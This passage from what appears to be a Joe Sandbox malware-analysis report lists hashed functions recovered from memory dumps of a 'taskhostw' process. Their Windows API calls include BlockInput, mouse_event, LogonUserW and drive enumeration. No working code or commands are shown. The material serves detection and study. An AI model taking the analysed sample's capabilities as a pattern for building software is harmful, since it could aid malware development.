                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd8541860ab72cdf77548bc7a0531dfcf52e2b2e220a2e7128b5ab889c1488ef
                                                                  • Instruction ID: ce3a43d7b6c980650f2fcc0e758ea5ac573ca7dc34dddf34155d4fb0093e59e1
                                                                  • Opcode Fuzzy Hash: bd8541860ab72cdf77548bc7a0531dfcf52e2b2e220a2e7128b5ab889c1488ef
                                                                  • Instruction Fuzzy Hash: 67B10124E6AF404DD3239A399839336BA4CAFBB2C5F51D71BFC2674D22FB2185834141
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: ef3697acd10ad49b11cf7d3e06496f8e558f2c8359622c315c38170e70c8d123
                                                                  • Instruction ID: e034f818553e80cbcf9bac76550bc2489f4d6b109b4c6550965bf3f4a4e13e01
                                                                  • Opcode Fuzzy Hash: ef3697acd10ad49b11cf7d3e06496f8e558f2c8359622c315c38170e70c8d123
                                                                  • Instruction Fuzzy Hash: DAE048322141146FC714AF5AE405A96FFDCAF74764F008056FD49DB351DB70E9418B90
                                                                  APIs
                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00214D1D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: 50b5d90c9fa8631bf406e2eaf47ab0147409266408ee671b1823ae589fca49da
                                                                  • Instruction ID: 2898ae77fa4627413de6caef8f0271228694f56b61d3edeb19f6bff371e8393c
                                                                  • Opcode Fuzzy Hash: 50b5d90c9fa8631bf406e2eaf47ab0147409266408ee671b1823ae589fca49da
                                                                  • Instruction Fuzzy Hash: AED09EA417460679FC282F20BD2FBF61189F334B96FE84549760A971C5A8E868E1A435
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002086B1), ref: 00208A93
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 330b3ec29ab4db59679d6adab7e4e8e9b0898bb8e19c406d00e56175b4b011a0
                                                                  • Instruction ID: 7582131c3c3a1507c1ecc224b16a7d762987737c50d0b0e0820acd19080ca97e
                                                                  • Opcode Fuzzy Hash: 330b3ec29ab4db59679d6adab7e4e8e9b0898bb8e19c406d00e56175b4b011a0
                                                                  • Instruction Fuzzy Hash: E9D05E3226450EABEF018EA8ED05EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 001F2171
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: cbba07f2e0c4954220ecf8c345fe76046b8ec38fd26587dd17fdd112a551d9b5
                                                                  • Instruction ID: 86f605170d6f7960613b14a4a171710d03554ce4319d96ad620b99a3a82b9e27
                                                                  • Opcode Fuzzy Hash: cbba07f2e0c4954220ecf8c345fe76046b8ec38fd26587dd17fdd112a551d9b5
                                                                  • Instruction Fuzzy Hash: B3C048F180110DEBCB09DBA0EA98DFEB7BCAB08304F2040A6A202F2100D7749B488B71
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 001DA2AA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: b88f6925919eac5725ab857ab69aa987b3aad5db0b72e76dcf2d75b91bea4516
                                                                  • Instruction ID: dffd27cc297857973eb14b6aa7e0f20ddbecdc73da8565a88616eb4a6d485fd1
                                                                  • Opcode Fuzzy Hash: b88f6925919eac5725ab857ab69aa987b3aad5db0b72e76dcf2d75b91bea4516
                                                                  • Instruction Fuzzy Hash: 74A0113000020CABCA002B82FC0888ABFACEA022A0B0080A0FC0C820228B32A8208A80
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5159475146703b0ff331103545ff725bcf9d4ebc69cda1cd0811d4df39d9a4ff
                                                                  • Instruction ID: a0d011546d7b931b495b3aefa2af0ad1026fb17417a172bff1ccc30908b4bc09
                                                                  • Opcode Fuzzy Hash: 5159475146703b0ff331103545ff725bcf9d4ebc69cda1cd0811d4df39d9a4ff
                                                                  • Instruction Fuzzy Hash: 5B221470910666CBCF388E28C4D4B7EB7A1FB21304F69806EE8569B5E2DB35DD91CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6448a3b11e8ff9466f0e578f329296174d29c08b5e91d5105d81ecfcb762292f
                                                                  • Instruction ID: e4f835e7c28fdf923fc978cccbfea4ef183bb77648e35a709033430cda3ff9ca
                                                                  • Opcode Fuzzy Hash: 6448a3b11e8ff9466f0e578f329296174d29c08b5e91d5105d81ecfcb762292f
                                                                  • Instruction Fuzzy Hash: E1024875640611AFCB14EF24C994A2AB7E6FF88324F04885DE98A9B361DF34ED44CF85
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: 10b0cfe4b2d6b9366fc7bd425921f3515bdb00e1dfbcfbc21c227227b9a2eb8f
                                                                  • Instruction ID: daa9bded8ff3e73e34e9a57c42d8b90604c4dd618acc88cd4ae5e529de20bdcb
                                                                  • Opcode Fuzzy Hash: 10b0cfe4b2d6b9366fc7bd425921f3515bdb00e1dfbcfbc21c227227b9a2eb8f
                                                                  • Instruction Fuzzy Hash: 2FE15C71204210AFCB14DF24C994E6BBBFAEF89714B14896EF84ADB261DB30E945CF51
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b075de1fa2b3c0403cd088eb130ff7c5bcb26e217d8e657d172666baa058c19f
                                                                  • Instruction ID: 94f6302cae6d9e4bee997e31a807b20352d315329e0531742eb9f1184f721eb8
                                                                  • Opcode Fuzzy Hash: b075de1fa2b3c0403cd088eb130ff7c5bcb26e217d8e657d172666baa058c19f
                                                                  • Instruction Fuzzy Hash: E4A135B1164924BEE728AB288CD8E7F256EDB49308F14091BFC02D6182DF359D41CFB5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction ID: 65e2cf0cbe367336f4d47a51825f2d42c4e00a971faac94c37e99848b6f399fd
                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction Fuzzy Hash: 53C1923220519309DF6D473A8CB513EBEE29E926B671A07ADD4BBCB5C5EF20C124D624
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction ID: 008f8b317fab536a7f816c377b90d150398f1ba2751390f511f552382333c4a0
                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction Fuzzy Hash: 34C183322151A31ADF2D4639843453EBEA15EB27B231A075FE8B3CB2D5EF20D568D620
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction ID: a0e1f98032ea780cdbe684e8c33d5642469314dd9df2145f307d92d564b53254
                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction Fuzzy Hash: D0C1A53221519309DF6D473ACCB513EBFE29A926B631A07ADD4BBDB4C5EF20C124D624
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction ID: fa8f2b38caea799731dd789758d628f905bf1963115b5421f18fdc91a2ea7e18
                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction Fuzzy Hash: 9EC153322151A319DF6D463AC47413EBFA15FA27B231A176FE4B2DB2D5EF20C528D620
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction ID: ff3aded019d64b84943776107a1ef9219f13c5b027d9fc170d420866c89ae439
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: 60C194322051930ADF6D47398CB513EBEE29A926B671A07EDD4BBCB5C4EF20C164D624
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: b6b5bcb36d6e22ed875514901b751ee6a10c67fa8fa8188df1a3c95ba1fddd06
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: F3C191322151930ADF6D47398CB513EFEE29A926B631A07EDD4B7DB5C4EF20C128D624
                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0023A662
                                                                  • GetSysColorBrush.USER32 ref: 0023A693
                                                                  • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,001EBABA,?,?), ref: 0023A69F
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0023A6B9
                                                                  • SelectObject.GDI32(?,00000000), ref: 0023A6C8
                                                                  • InflateRect.USER32 ref: 0023A6F3
                                                                  • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,001EBABA,?,?), ref: 0023A6FB
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0023A702
                                                                  • FrameRect.USER32 ref: 0023A711
                                                                  • DeleteObject.GDI32(00000000), ref: 0023A718
                                                                  • InflateRect.USER32 ref: 0023A763
                                                                  • FillRect.USER32 ref: 0023A795
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0023A7C0
                                                                    • Part of subcall function 0023A8FC: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?), ref: 0023A935
                                                                    • Part of subcall function 0023A8FC: SetTextColor.GDI32(?,?), ref: 0023A939
                                                                    • Part of subcall function 0023A8FC: GetSysColorBrush.USER32 ref: 0023A94F
                                                                    • Part of subcall function 0023A8FC: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A95A
                                                                    • Part of subcall function 0023A8FC: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A977
                                                                    • Part of subcall function 0023A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0023A985
                                                                    • Part of subcall function 0023A8FC: SelectObject.GDI32(?,00000000), ref: 0023A996
                                                                    • Part of subcall function 0023A8FC: SetBkColor.GDI32(?,00000000), ref: 0023A99F
                                                                    • Part of subcall function 0023A8FC: SelectObject.GDI32(?,?), ref: 0023A9AC
                                                                    • Part of subcall function 0023A8FC: InflateRect.USER32 ref: 0023A9CB
                                                                    • Part of subcall function 0023A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0023A9E2
                                                                    • Part of subcall function 0023A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 0023A9F7
                                                                    • Part of subcall function 0023A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0023AA1F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 3521893082-0
                                                                  • Opcode ID: 82c17da721ae39b0713f0510bfbb510ea774484db8dbeb5252c5a0d8c2175281
                                                                  • Instruction ID: 2ae3ab4c28e53a0c1ae592bb8bcd904bf112989b5ec6bb6bc66994ddcc480470
                                                                  • Opcode Fuzzy Hash: 82c17da721ae39b0713f0510bfbb510ea774484db8dbeb5252c5a0d8c2175281
                                                                  • Instruction Fuzzy Hash: ED916DB2818301BFCB509F64FD4CE5BBBA9FB88321F100A29F5A6961A1D771D944CF52
                                                                  APIs
                                                                  • DestroyWindow.USER32 ref: 001B2CA2
                                                                  • DeleteObject.GDI32(00000000), ref: 001B2CE8
                                                                  • DeleteObject.GDI32(00000000), ref: 001B2CF3
                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 001B2CFE
                                                                  • DestroyWindow.USER32 ref: 001B2D09
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 001EC5BB
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001EC5F4
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001ECA1D
                                                                    • Part of subcall function 001B1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 001B1B9A
                                                                  • SendMessageW.USER32(?,00001053), ref: 001ECA5A
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001ECA71
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001ECA87
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001ECA92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                  • String ID: 0
                                                                  • API String ID: 464785882-4108050209
                                                                  • Opcode ID: 6af4a827f902dc93227f5882e53689669e43e835dc3b871eaf5a3a50508f42e9
                                                                  • Instruction ID: 69dc89f9fd7caccd1d715c1f7a6262bffe2f9f103066fda65c0406dde21304f7
                                                                  • Opcode Fuzzy Hash: 6af4a827f902dc93227f5882e53689669e43e835dc3b871eaf5a3a50508f42e9
                                                                  • Instruction Fuzzy Hash: EF129C30600A41EFDB25CF25D989BAEBBE5FF49300F544569F895CB262C731E846CB91
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0021ADAA
                                                                  • GetDriveTypeW.KERNEL32(?,0023FAC0,?,\\.\,0023F910), ref: 0021AE87
                                                                  • SetErrorMode.KERNEL32(00000000,0023FAC0,?,\\.\,0023F910), ref: 0021AFE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: a472efa55bee452043b5e2c093cd7e9a219731243ece6659df20942d1ec4bc32
                                                                  • Instruction ID: df42eafc93ecdcd4f116fa95610b22fb243baa7dabb3a0ba7d8d4044c728c546
                                                                  • Opcode Fuzzy Hash: a472efa55bee452043b5e2c093cd7e9a219731243ece6659df20942d1ec4bc32
                                                                  • Instruction Fuzzy Hash: 8251C4B46762059BCB20EF50C9828F9B3F1AB653047204166F906E7691CB72DDF2DB93
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
